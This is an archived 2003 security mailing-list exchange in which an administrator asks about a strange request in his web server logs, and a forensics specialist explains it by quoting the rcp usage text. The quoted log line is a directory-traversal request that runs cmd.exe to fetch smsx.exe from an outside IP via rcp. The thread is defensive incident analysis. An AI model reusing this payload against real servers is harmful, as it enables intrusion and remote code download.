No, adm is the user, at least according to the rcp usage instructions. H:\>rcp Copies files to and from computer running the RCP service. RCP [-a | -b] [-h] [-r] [host][.user:]source [host][.user:] path\destination -a Specifies ASCII transfer mode. This mode converts the EOL characters to a carriage return for UNIX and a carriage return/line feed for personal computers. This is the default transfer mode. -b Specifies binary image transfer mode. -h Transfers hidden files. -r Copies the contents of all subdirectories; destination must be a directory. host Specifies the local or remote host. If host is specified as an IP address OR if host name contains dots, you must specify the user. .user: Specifies a user name to use, rather than the current user name. source Specifes the files to copy. path\destination Specifies the path relative to the logon directory on the remote host. Use the escape characters (\ , ", or ') in remote paths to use wildcard characters on the remote host. "rcp -b 195.92.252.138.adm:smsx.exe ." RCP smsx.exe from 195.92.252.138 to . (here) as user adm. Your windows guy should have tried typing the command with no arguments... ;-P Cory Altheide Computer Forensics Specialist NCI Information Systems, Inc. NNSA Cyber Forensics Center altheidecat_private > -----Original Message----- > From: Steve Bromwich [mailto:incidentat_private] > Sent: Monday, May 05, 2003 10:30 AM > To: incidentsat_private > Subject: smsx.exe? > > > Hi, > > Has anyone seen a request like this in their logs? > > 205.247.193.56 - - [05/May/2003:11:59:52 -0300] > "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+rcp+-b+195.9 2.252.138.adm:smsx.exe+." > > I tried rcping smsx.exe off the remote site but no joy; is > the .adm an obscure windows-specific port address or > something? One of our windows guys said the smsx was "remote > management software", but had no idea about the .adm... > > On a side note, the response I got from energis (the > 195.92.252.138 owner) had the following at the start: > > PLEASE NOTE WE ARE CURRENTLY DEALING WITH A 2 WEEK BACKLOG > > Further down: > > Please note that if one of our IP addresses looks up to a > 'webcache' (as opposed to a modem) we have a *maximum* of 30 > hours to trace the user responsible for the abuse. > > So I guess this means that Energis users have a pretty good > chance of abusing remote servers through Energis' web cache > and getting away with it :-/ > > Cheers, Steve > > -------------------------------------------------------------- > -------------- > Attend Black Hat Briefings & Training Europe, May 12-15 in > Amsterdam, the > world's premier event for IT and network security experts. > The two-day > Training features 6 hand-on courses on May 12-13 taught by > professionals. > The two-day Briefings on May 14-15 features 24 top speakers > with no vendor > sales pitches. Deadline for the best rates is April 25. > Register today to > ensure your place. http://www.securityfocus.com/BlackHat-incidents > -------------------------------------------------------------- > -------------- > > ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon May 05 2003 - 17:34:39 PDT